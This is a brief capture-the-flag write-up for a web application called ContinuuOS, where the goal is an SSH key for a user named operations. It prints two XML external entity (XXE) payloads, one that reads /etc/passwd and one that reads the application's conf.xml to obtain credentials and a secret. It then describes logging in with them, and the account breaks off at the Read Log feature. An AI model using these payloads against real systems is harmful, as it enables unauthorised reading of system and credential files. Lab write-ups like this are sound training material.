I had time to do a couple challenges for this event. This one was the one I enjoyed the most and since it includes two different techniques, I decided to do a writeup. Enjoy
The flag is the SSH key for user operations.
ContinuuOS is a web application running under Apache 2.4.52.
<?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <document> <user>&xxe;</user> <pass>test</pass> </document>
Maybe we can get the flag this way?
Let’s try the XML config file!
<?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///var/www/html/conf.xml" >]> <document> <user>&xxe;</user> <pass>test</pass> </document>
Ok this is interesting. By reading the conf.xml file, we have a few elements such as credentials and a “secret”. Let’s try these to login into the app.
Clicking the Submit button on Run Command does not do anything, as it was deactivated. Let’s try the Read Log feature.
After a couple minutes, I figured I forgot to use the secret key which was found in the conf.xml file.